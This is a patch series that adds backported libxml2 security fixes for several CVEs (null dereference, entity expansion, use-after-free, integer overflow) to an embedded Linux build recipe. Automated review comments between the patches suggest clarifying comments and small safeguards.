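+Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
+
+Check return value of recursive calls to
+xmlParseElementChildrenContentDeclPriv and return immediately in case
+of errors. Otherwise, struct xmlElementContent could contain unexpected
+null pointers, leading to a null deref when post-validating documents
+which aren't well-formed and parsed in recovery mode.
+
+Fixes #243.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
+CVE: CVE-2021-3537
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ parser.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index b42e6043..73c27edd 100644
+--- a/parser.c
++++ b/parser.c
+@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (cur == NULL)
++ return(NULL);
+ SKIP_BLANKS;
+ GROW;
+ } else {
+@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
+ SKIP_BLANKS;
+ last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
+ depth + 1);
++ if (last == NULL) {
++ if (ret != NULL)
++ xmlFreeDocElementContent(ctxt->myDoc, ret);
++ return(NULL);
++ }
+ SKIP_BLANKS;
+ } else {
+ elem = xmlParseName(ctxt);
+--
+GitLab
+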
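Review bot: The two added early returns in xmlParseElementChildrenContentDeclPriv clean up differently and neither says why: the first returns without freeing anything, the second frees `ret` first. At the first site `cur` and `ret` were assigned from the same call, so nothing is held when the result is NULL; a comment such as `/* cur == ret: nothing allocated yet */` there, and `/* drop the partial content tree built so far */` at the second, would make the ownership explicit. Whether the recursive call has already reported a parser error on every NULL path cannot be seen from these hunks, since the function body starts and ends outside them.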
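--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
+From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
+From: Daniel Veillard <veillard@redhat.com>
+Date: Thu, 13 May 2021 14:55:12 +0200
+Subject: [PATCH] Patch for security issue CVE-2021-3541
+
+This is relapted to parameter entities expansion and following
+the line of the billion laugh attack. Somehow in that path the
+counting of parameters was missed and the normal algorithm based
+on entities "density" was useless.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
+CVE: CVE-2021-3541
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ parser.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/parser.c b/parser.c
+index f5e5e169..c9312fa4 100644
+--- a/parser.c
++++ b/parser.c
+@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ xmlEntityPtr ent, size_t replacement)
+ {
+ size_t consumed = 0;
++ int i;
+
+ if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
+ return (0);
+@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
+ rep = NULL;
+ }
+ }
++
++ /*
++ * Prevent entity exponential check, not just replacement while
++ * parsing the DTD
++ * The check is potentially costly so do that only once in a thousand
++ */
++ if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
++ (ctxt->nbentities % 1024 == 0)) {
++ for (i = 0;i < ctxt->inputNr;i++) {
++ consumed += ctxt->inputTab[i]->consumed +
++ (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
++ }
++ if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
++ xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
++ ctxt->instate = XML_PARSER_EOF;
++ return (1);
++ }
++ consumed = 0;
++ }
++
++
++
+ if (replacement != 0) {
+ if (replacement < XML_MAX_TEXT_LENGTH)
+ return(0);
+@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
+ xmlChar start[4];
+ xmlCharEncoding enc;
+
++ if (xmlParserEntityCheck(ctxt, 0, entity, 0))
++ return;
++
+ if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
+ ((ctxt->options & XML_PARSE_NOENT) == 0) &&
+ ((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
+--
+GitLab
+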
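Review bot: The new DTD check in xmlParserEntityCheck sits after the existing `if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE)) return (0);`, so a parser created with XML_PARSE_HUGE gets no protection from it; that limit should be stated in the comment or the patch header so integrators do not treat the CVE as closed for such callers. The comment itself reads "Prevent entity exponential check" and "once in a thousand", while the code samples at `ctxt->nbentities % 1024 == 0` once more than 10000 entities were seen; I would reword it to `/* Detect exponential parameter-entity growth while parsing the DTD; sampled every 1024th entity because walking inputTab is costly. */`. If nbentities can advance by more than one between calls (not visible in these hunks), the exact-multiple test can be missed for long stretches, which is worth confirming against the rest of parser.c.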
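--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
+From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 22 Feb 2022 11:51:08 +0100
+Subject: [PATCH] Fix --without-valid build
+
+Regressed in commit 652dd12a.
+---
+ valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
+ 1 file changed, 29 insertions(+), 29 deletions(-)
+---
+
+From https://github.com/GNOME/libxml2.git
+ commit 646fe48d1c8a74310c409ddf81fe7df6700052af
+
+CVE: CVE-2022-23308
+Upstream-Status: Backport
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+diff --git a/valid.c b/valid.c
+index 8e596f1d..9684683a 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
+-/**
+- * xmlValidNormalizeString:
+- * @str: a string
+- *
+- * Normalize a string in-place.
+- */
+-static void
+-xmlValidNormalizeString(xmlChar *str) {
+- xmlChar *dst;
+- const xmlChar *src;
+-
+- if (str == NULL)
+- return;
+- src = str;
+- dst = str;
+-
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
+-}
+-
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ static int
+ xmlIsStreaming(xmlValidCtxtPtr ctxt) {
+ xmlParserCtxtPtr pctxt;
+--
+2.35.1
+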
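--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
+From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Feb 2022 03:29:24 +0100
+Subject: [PATCH] Use-after-free of ID and IDREF attributes
+
+If a document is parsed with XML_PARSE_DTDVALID and without
+XML_PARSE_NOENT, the value of ID attributes has to be normalized after
+potentially expanding entities in xmlRemoveID. Otherwise, later calls
+to xmlGetID can return a pointer to previously freed memory.
+
+ID attributes which are empty or contain only whitespace after
+entity expansion are affected in a similar way. This is fixed by
+not storing such attributes in the ID table.
+
+The test to detect streaming mode when validating against a DTD was
+broken. In connection with the defects above, this could result in a
+use-after-free when using the xmlReader interface with validation.
+Fix detection of streaming mode to avoid similar issues. (This changes
+the expected result of a test case. But as far as I can tell, using the
+XML reader with XIncludes referencing the root document never worked
+properly, anyway.)
+
+All of these issues can result in denial of service. Using xmlReader
+with validation could result in disclosure of memory via the error
+channel, typically stderr. The security impact of xmlGetID returning
+a pointer to freed memory depends on the application. The typical use
+case of calling xmlGetID on an unmodified document is not affected.
+
+Upstream-Status: Backport
+[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
+
+The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
+to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
+this particular test does not exist in v2.9.10 (it was added later).
+
+CVE: CVE-2022-23308
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+---
+ valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
+ 1 file changed, 55 insertions(+), 33 deletions(-)
+
+diff --git a/valid.c b/valid.c
+index 07963e7..ee75311 100644
+--- a/valid.c
++++ b/valid.c
+@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
+ return (ret);
+ }
+
++/**
++ * xmlValidNormalizeString:
++ * @str: a string
++ *
++ * Normalize a string in-place.
++ */
++static void
++xmlValidNormalizeString(xmlChar *str) {
++ xmlChar *dst;
++ const xmlChar *src;
++
++ if (str == NULL)
++ return;
++ src = str;
++ dst = str;
++
++ while (*src == 0x20) src++;
++ while (*src != 0) {
++ if (*src == 0x20) {
++ while (*src == 0x20) src++;
++ if (*src != 0)
++ *dst++ = 0x20;
++ } else {
++ *dst++ = *src++;
++ }
++ }
++ *dst = 0;
++}
++
+ #ifdef DEBUG_VALID_ALGO
+ static void
+ xmlValidPrintNode(xmlNodePtr cur) {
+@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
+ (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
+ xmlFree((char *)(str));
+
++static int
++xmlIsStreaming(xmlValidCtxtPtr ctxt) {
++ xmlParserCtxtPtr pctxt;
++
++ if (ctxt == NULL)
++ return(0);
++ /*
++ * These magic values are also abused to detect whether we're validating
++ * while parsing a document. In this case, userData points to the parser
++ * context.
++ */
++ if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
++ (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
++ return(0);
++ pctxt = ctxt->userData;
++ return(pctxt->parseMode == XML_PARSE_READER);
++}
++
+ /**
+ * xmlFreeID:
+ * @not: A id
+@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ if (doc == NULL) {
+ return(NULL);
+ }
+- if (value == NULL) {
++ if ((value == NULL) || (value[0] == 0)) {
+ return(NULL);
+ }
+ if (attr == NULL) {
+@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ */
+ ret->value = xmlStrdup(value);
+ ret->doc = doc;
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
+ ID = xmlNodeListGetString(doc, attr->children, 1);
+ if (ID == NULL)
+ return(-1);
++ xmlValidNormalizeString(ID);
+
+ id = xmlHashLookup(table, ID);
+ if (id == NULL || id->attr != attr) {
+@@ -3009,7 +3057,7 @@ xmlAddRef(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
+ * fill the structure.
+ */
+ ret->value = xmlStrdup(value);
+- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
++ if (xmlIsStreaming(ctxt)) {
+ /*
+ * Operating in streaming mode, attr is gonna disappear
+ */
+@@ -4028,8 +4076,7 @@ xmlValidateAttributeValue2(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlNodePtr elem, const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+ int extsubset = 0;
+
+@@ -4070,19 +4117,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ if ((doc->standalone) && (extsubset == 1) && (!xmlStrEqual(value, ret))) {
+ xmlErrValidNode(ctxt, elem, XML_DTD_NOT_STANDALONE,
+ "standalone: %s on %s value had to be normalized based on external subset declaration\n",
+@@ -4114,8 +4149,7 @@ xmlValidCtxtNormalizeAttributeValue(xmlValidCtxtPtr ctxt, xmlDocPtr doc,
+ xmlChar *
+ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ const xmlChar *name, const xmlChar *value) {
+- xmlChar *ret, *dst;
+- const xmlChar *src;
++ xmlChar *ret;
+ xmlAttributePtr attrDecl = NULL;
+
+ if (doc == NULL) return(NULL);
+@@ -4145,19 +4179,7 @@ xmlValidNormalizeAttributeValue(xmlDocPtr doc, xmlNodePtr elem,
+ ret = xmlStrdup(value);
+ if (ret == NULL)
+ return(NULL);
+- src = value;
+- dst = ret;
+- while (*src == 0x20) src++;
+- while (*src != 0) {
+- if (*src == 0x20) {
+- while (*src == 0x20) src++;
+- if (*src != 0)
+- *dst++ = 0x20;
+- } else {
+- *dst++ = *src++;
+- }
+- }
+- *dst = 0;
++ xmlValidNormalizeString(ret);
+ return(ret);
+ }
+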
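Review bot: The new helper xmlIsStreaming treats `ctxt->userData` as a parser context purely on the strength of the `finishDtd` magic values and dereferences it without a NULL check; unlike its neighbours it also has no doc block. A validation context whose `finishDtd` holds one of those values while `userData` is unset would fault at `pctxt->parseMode`, so adding `if (pctxt == NULL) return(0);` before the final return is a cheap safeguard. A header comment stating the contract (returns non-zero only when validating during xmlReader parsing, and `userData` must then point to the xmlParserCtxt) would also record why xmlAddID and xmlAddRef moved away from the `vstateNr` test.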
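--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch
@@ -0,0 +1,53 @@
+From b07251215ef48c70c6e56f7351406c47cfca4d5b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 10 Jan 2020 15:55:07 +0100
+Subject: [PATCH] Fix integer overflow in xmlBufferResize
+
+Found by OSS-Fuzz.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/b07251215ef48c70c6e56f7351406c47cfca4d5b]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ tree.c | 9 +++++++--
+ 1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/tree.c b/tree.c
+index 0d7fc98c..f43f6de1 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7424,12 +7424,17 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (size < buf->size)
+ return 1;
+
++ if (size > UINT_MAX - 10) {
++ xmlTreeErrMemory("growing buffer");
++ return 0;
++ }
++
+ /* figure out new size */
+ switch (buf->alloc){
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ newSize = (buf->size ? buf->size : size + 10);
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7445,7 +7450,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+--
+GitLab
+
+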
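Review bot: The header tags this 2020 commit with `CVE: CVE-2022-29824` but never states that it is only a prerequisite for CVE-2022-29824.patch, which is what the `-dependent` file name implies. A sentence in the description such as `Prerequisite for CVE-2022-29824.patch; not the fix itself.` keeps CVE tracking and later refreshes accurate. In the code, the new `size > UINT_MAX - 10` guard protects the `size + 10` expressions further down xmlBufferResize; a one-line comment like `/* size + 10 below must not wrap */` would stop it being dropped as redundant, since the doubling loops carry their own `UINT_MAX / 2` test. The function body starts and ends outside the hunks.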
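--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch
@@ -0,0 +1,348 @@
+From 2554a2408e09f13652049e5ffb0d26196b02ebab Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Tue, 8 Mar 2022 20:10:02 +0100
+Subject: [PATCH] [CVE-2022-29824] Fix integer overflows in xmlBuf and
+ xmlBuffer
+
+In several places, the code handling string buffers didn't check for
+integer overflow or used wrong types for buffer sizes. This could
+result in out-of-bounds writes or other memory errors when working on
+large, multi-gigabyte buffers.
+
+Thanks to Felix Wilhelm for the report.
+
+CVE: CVE-2022-29824
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/2554a2408e09f13652049e5ffb0d26196b02ebab]
+
+Signed-off-by: Riyaz Ahmed Khan <Riyaz.Khan@kpit.com>
+
+---
+ buf.c | 86 +++++++++++++++++++++++-----------------------------------
+ tree.c | 72 ++++++++++++++++++------------------------------
+ 2 files changed, 61 insertions(+), 97 deletions(-)
+
+diff --git a/buf.c b/buf.c
+index 24368d37..40a5ee06 100644
+--- a/buf.c
++++ b/buf.c
+@@ -30,6 +30,10 @@
+ #include <libxml/parserInternals.h> /* for XML_MAX_TEXT_LENGTH */
+ #include "buf.h"
+
++#ifndef SIZE_MAX
++#define SIZE_MAX ((size_t) -1)
++#endif
++
+ #define WITH_BUFFER_COMPAT
+
+ /**
+@@ -156,6 +160,8 @@ xmlBufPtr
+ xmlBufCreateSize(size_t size) {
+ xmlBufPtr ret;
+
++ if (size == SIZE_MAX)
++ return(NULL);
+ ret = (xmlBufPtr) xmlMalloc(sizeof(xmlBuf));
+ if (ret == NULL) {
+ xmlBufMemoryError(NULL, "creating buffer");
+@@ -166,8 +172,8 @@ xmlBufCreateSize(size_t size) {
+ ret->error = 0;
+ ret->buffer = NULL;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
+- ret->compat_size = (int) ret->size;
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
++ ret->compat_size = (ret->size > INT_MAX ? INT_MAX : ret->size);
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -442,23 +448,17 @@ xmlBufGrowInternal(xmlBufPtr buf, size_t len) {
+ CHECK_COMPAT(buf)
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (buf->use + len < buf->size)
++ if (len < buf->size - buf->use)
+ return(buf->size - buf->use);
++ if (len > SIZE_MAX - buf->use)
++ return(0);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > (size_t) len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > SIZE_MAX / 2 ? SIZE_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > SIZE_MAX - 100 ? SIZE_MAX : size + 100;
++ }
+
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+@@ -744,7 +744,7 @@ xmlBufIsEmpty(const xmlBufPtr buf)
+ int
+ xmlBufResize(xmlBufPtr buf, size_t size)
+ {
+- unsigned int newSize;
++ size_t newSize;
+ xmlChar* rebuf = NULL;
+ size_t start_buf;
+
+@@ -772,9 +772,13 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size*2 : size + 10);
++ if (buf->size == 0) {
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
++ } else {
++ newSize = buf->size;
++ }
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -782,15 +786,15 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+ newSize = size;
+ else {
+- newSize = buf->size * 2;
++ newSize = buf->size;
+ while (size > newSize) {
+- if (newSize > UINT_MAX / 2) {
++ if (newSize > SIZE_MAX / 2) {
+ xmlBufMemoryError(buf, "growing buffer");
+ return 0;
+ }
+@@ -800,7 +804,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > SIZE_MAX - 10 ? SIZE_MAX : size + 10);
+ break;
+ }
+
+@@ -866,7 +870,7 @@ xmlBufResize(xmlBufPtr buf, size_t size)
+ */
+ int
+ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+- unsigned int needSize;
++ size_t needSize;
+
+ if ((str == NULL) || (buf == NULL) || (buf->error))
+ return -1;
+@@ -888,8 +892,10 @@ xmlBufAdd(xmlBufPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((size_t) len >= buf->size - buf->use) {
++ if ((size_t) len >= SIZE_MAX - buf->use)
++ return(-1);
++ needSize = buf->use + len + 1;
+ if (buf->alloc == XML_BUFFER_ALLOC_BOUNDED) {
+ /*
+ * Used to provide parsing limits
+@@ -1025,31 +1031,7 @@ xmlBufCat(xmlBufPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufCCat(xmlBufPtr buf, const char *str) {
+- const char *cur;
+-
+- if ((buf == NULL) || (buf->error))
+- return(-1);
+- CHECK_COMPAT(buf)
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufResize(buf, buf->use+10)){
+- xmlBufMemoryError(buf, "growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- UPDATE_COMPAT(buf)
+- return 0;
++ return xmlBufCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+diff --git a/tree.c b/tree.c
+index 9d94aa42..86afb7d6 100644
+--- a/tree.c
++++ b/tree.c
+@@ -7104,6 +7104,8 @@ xmlBufferPtr
+ xmlBufferCreateSize(size_t size) {
+ xmlBufferPtr ret;
+
++ if (size >= UINT_MAX)
++ return(NULL);
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+ xmlTreeErrMemory("creating buffer");
+@@ -7111,7 +7113,7 @@ xmlBufferCreateSize(size_t size) {
+ }
+ ret->use = 0;
+ ret->alloc = xmlBufferAllocScheme;
+- ret->size = (size ? size+2 : 0); /* +1 for ending null */
++ ret->size = (size ? size + 1 : 0); /* +1 for ending null */
+ if (ret->size){
+ ret->content = (xmlChar *) xmlMallocAtomic(ret->size * sizeof(xmlChar));
+ if (ret->content == NULL) {
+@@ -7171,6 +7173,8 @@ xmlBufferCreateStatic(void *mem, size_t size) {
+
+ if ((mem == NULL) || (size == 0))
+ return(NULL);
++ if (size > UINT_MAX)
++ return(NULL);
+
+ ret = (xmlBufferPtr) xmlMalloc(sizeof(xmlBuffer));
+ if (ret == NULL) {
+@@ -7318,28 +7322,23 @@ xmlBufferShrink(xmlBufferPtr buf, unsigned int len) {
+ */
+ int
+ xmlBufferGrow(xmlBufferPtr buf, unsigned int len) {
+- int size;
++ unsigned int size;
+ xmlChar *newbuf;
+
+ if (buf == NULL) return(-1);
+
+ if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return(0);
+- if (len + buf->use < buf->size) return(0);
++ if (len < buf->size - buf->use)
++ return(0);
++ if (len > UINT_MAX - buf->use)
++ return(-1);
+
+- /*
+- * Windows has a BIG problem on realloc timing, so we try to double
+- * the buffer size (if that's enough) (bug 146697)
+- * Apparently BSD too, and it's probably best for linux too
+- * On an embedded system this may be something to change
+- */
+-#if 1
+- if (buf->size > len)
+- size = buf->size * 2;
+- else
+- size = buf->use + len + 100;
+-#else
+- size = buf->use + len + 100;
+-#endif
++ if (buf->size > (size_t) len) {
++ size = buf->size > UINT_MAX / 2 ? UINT_MAX : buf->size * 2;
++ } else {
++ size = buf->use + len;
++ size = size > UINT_MAX - 100 ? UINT_MAX : size + 100;
++ }
+
+ if ((buf->alloc == XML_BUFFER_ALLOC_IO) && (buf->contentIO != NULL)) {
+ size_t start_buf = buf->content - buf->contentIO;
+@@ -7466,7 +7465,10 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ case XML_BUFFER_ALLOC_IO:
+ case XML_BUFFER_ALLOC_DOUBLEIT:
+ /*take care of empty case*/
+- newSize = (buf->size ? buf->size : size + 10);
++ if (buf->size == 0)
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);
++ else
++ newSize = buf->size;
+ while (size > newSize) {
+ if (newSize > UINT_MAX / 2) {
+ xmlTreeErrMemory("growing buffer");
+@@ -7476,7 +7478,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ }
+ break;
+ case XML_BUFFER_ALLOC_EXACT:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ case XML_BUFFER_ALLOC_HYBRID:
+ if (buf->use < BASE_BUFFER_SIZE)
+@@ -7494,7 +7496,7 @@ xmlBufferResize(xmlBufferPtr buf, unsigned int size)
+ break;
+
+ default:
+- newSize = size+10;
++ newSize = (size > UINT_MAX - 10 ? UINT_MAX : size + 10);;
+ break;
+ }
+
+@@ -7580,8 +7582,10 @@ xmlBufferAdd(xmlBufferPtr buf, const xmlChar *str, int len) {
+ if (len < 0) return -1;
+ if (len == 0) return 0;
+
+- needSize = buf->use + len + 2;
+- if (needSize > buf->size){
++ if ((unsigned) len >= buf->size - buf->use) {
++ if ((unsigned) len >= UINT_MAX - buf->use)
++ return XML_ERR_NO_MEMORY;
++ needSize = buf->use + len + 1;
+ if (!xmlBufferResize(buf, needSize)){
+ xmlTreeErrMemory("growing buffer");
+ return XML_ERR_NO_MEMORY;
+@@ -7694,29 +7698,7 @@ xmlBufferCat(xmlBufferPtr buf, const xmlChar *str) {
+ */
+ int
+ xmlBufferCCat(xmlBufferPtr buf, const char *str) {
+- const char *cur;
+-
+- if (buf == NULL)
+- return(-1);
+- if (buf->alloc == XML_BUFFER_ALLOC_IMMUTABLE) return -1;
+- if (str == NULL) {
+-#ifdef DEBUG_BUFFER
+- xmlGenericError(xmlGenericErrorContext,
+- "xmlBufferCCat: str == NULL\n");
+-#endif
+- return -1;
+- }
+- for (cur = str;*cur != 0;cur++) {
+- if (buf->use + 10 >= buf->size) {
+- if (!xmlBufferResize(buf, buf->use+10)){
+- xmlTreeErrMemory("growing buffer");
+- return XML_ERR_NO_MEMORY;
+- }
+- }
+- buf->content[buf->use++] = *cur;
+- }
+- buf->content[buf->use] = 0;
+- return 0;
++ return xmlBufferCat(buf, (const xmlChar *) str);
+ }
+
+ /**
+--
+GitLab
+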
